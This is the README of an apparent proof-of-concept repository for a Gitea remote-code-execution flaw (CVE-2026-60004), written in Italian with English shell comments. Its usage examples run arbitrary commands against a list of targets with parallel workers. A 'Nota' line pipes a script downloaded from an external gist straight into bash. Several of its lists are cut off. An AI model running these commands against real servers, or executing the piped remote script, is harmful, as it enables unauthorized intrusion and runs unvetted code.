
CVE-2026-60004
Altro: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
Supporta la manutenzione di questo progetto con PayPal o scansionando il codice QR qui sotto.
Usa questo progetto solo in ambienti sicuri e autorizzati, come:
Configurazione di esempio:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Esempio di utilizzo:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
Nota:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y per rimuovere la directory .git annidataUn repository per apprendere, testare e ricercare concetti di cybersicurezza in ambienti controllati.
Questo repository è solo per ricerca sulla sicurezza educativa e autorizzata.
È progettato per aiutare gli utenti a imparare:
Usa questo repository solo in ambienti in cui hai il permesso, come:
L'uso non autorizzato o illegale è severamente vietato.
L'autore e i contributori non sono responsabili di eventuali danni, usi impropri, problemi legali o perdite causati da questo progetto.
Utilizzando questo repository, accetti che:
Questo progetto è pensato per:
Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.
Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.